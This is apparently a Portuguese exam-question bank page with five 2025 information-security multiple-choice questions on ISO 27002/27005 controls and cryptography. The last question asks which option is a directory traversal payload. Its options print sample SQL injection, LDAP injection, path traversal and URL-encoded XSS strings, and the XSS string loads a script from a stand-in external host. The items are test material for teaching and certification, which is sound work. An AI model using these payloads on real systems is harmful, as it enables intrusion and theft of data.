Questões de Segurança da Informação do ano 2025

#Questão 1131569 - Segurança da Informação, ISO 27002, SELECON, 2025, SENAPPEN, Analista em Tecnologia da Informação

Uma empresa de TI, aplicando a norma ISO 27002, focada em controles de segurança da informação, está, no momento, utilizando a diretriz de segurança das operações e das comunicações. Isso significa que ela está trabalhando com:

A)

controle da base de requisitos de negócio, assegurando o acesso de usuários autorizados e prevenindo o acesso não autorizado aos sistemas de informação da empresa, para evitar acesso indevido e danos ao processamento da informação

B)

definição dos procedimentos e das responsabilidades da gestão e operação dos recursos de processamento das informações, incluindo o gerenciamento de serviços terceirizados e o planejamento dos recursos, de modo a minimizar o risco de falhas

C)

identificação dos requisitos de segurança de sistemas de informação, acordando esses requisitos antes de algum desenvolvimento ou implementação de novos sistemas, protegendo a manutenção e integridade desses mesmos sistemas

D)

impedimento das violações de qualquer lei criminal ou civil, garantindo que os estatutos, regulamentações, obrigações contratuais ou quaisquer outros requisitos legais de segurança da informação sejam cumpridos

#Questão 1131571 - Segurança da Informação, Criptografia, SELECON, 2025, SENAPPEN, Analista em Tecnologia da Informação

Uma empresa financeira, para aumentar a segurança de suas transações, adotou um método de criptografia assimétrica, baseado nas propriedades matemáticas de curvas elípticas sobre campos finitos, que oferece maior segurança por aplicar comprimentos de chaves mais curtos, usando cálculos mais rápidos e menor consumo de energia. Esse método é o:

A)

AES

B)

ECC

C)

RC4

D)

RSA

#Questão 1131773 - Segurança da Informação, Criptografia, FGV, 2025, PC-MG, Perito Criminal - Área II

Os algoritmos simétricos e assimétricos desempenham um papel fundamental na proteção de dados em processos de criptografia. Os algoritmos RSA, Diffie-Hellman, AES e RC4 são comumente utilizados para garantir segurança em várias aplicações.
Nesse sentido, assinale a opção que indica um exemplo de criptografia simétrica segura e amplamente recomendada nos padrões modernos, que utiliza a mesma chave para criptografar e descriptografar dados.

A)

RSA.

B)

Diffie-Hellman.

C)

AES.

D)

RC4.

E)

RSA2.

#Questão 1132949 - Segurança da Informação, Norma 27005, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

De acordo com a ABNT NBR ISO/IEC 27005:2023, “a utilidade de categorizar controles como preventivos, detectivos e corretivos reside em seu uso, para assegurar que a construção de planos de tratamento de riscos sejam resilientes a falhas nos controles.” Considerando uma seleção apropriada de controles preventivos, detectivos e corretivos, assinale a alternativa correta.

A)

Convém que os controles corretivos reduzam a probabilidade de que os controles detectivos tenham que ser usados.

B)

Convém que os controles preventivos reduzam a probabilidade de que os controles corretivos tenham que ser usados.

C)

Convém que os controles detectivos mitiguem o risco se os controles corretivos falharem.

D)

Convém que os controles preventivos mitiguem o risco se os controles detectivos falharem.

#Questão 1132951 - Segurança da Informação, Ataques e ameaças, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.

A)

(&(username=p0wn3d)(password=Pa$$w0rd))

B)

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

C)

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hosts

D)

blablabla%3Cscript%20src%3D%22https%3A%2F%2Fsites3gur0.foo%2Fhook.js%22%3E%3C% 2Fscript%3E

Questões de Segurança da Informação do ano 2025

Pesquise questões de concurso nos filtros abaixo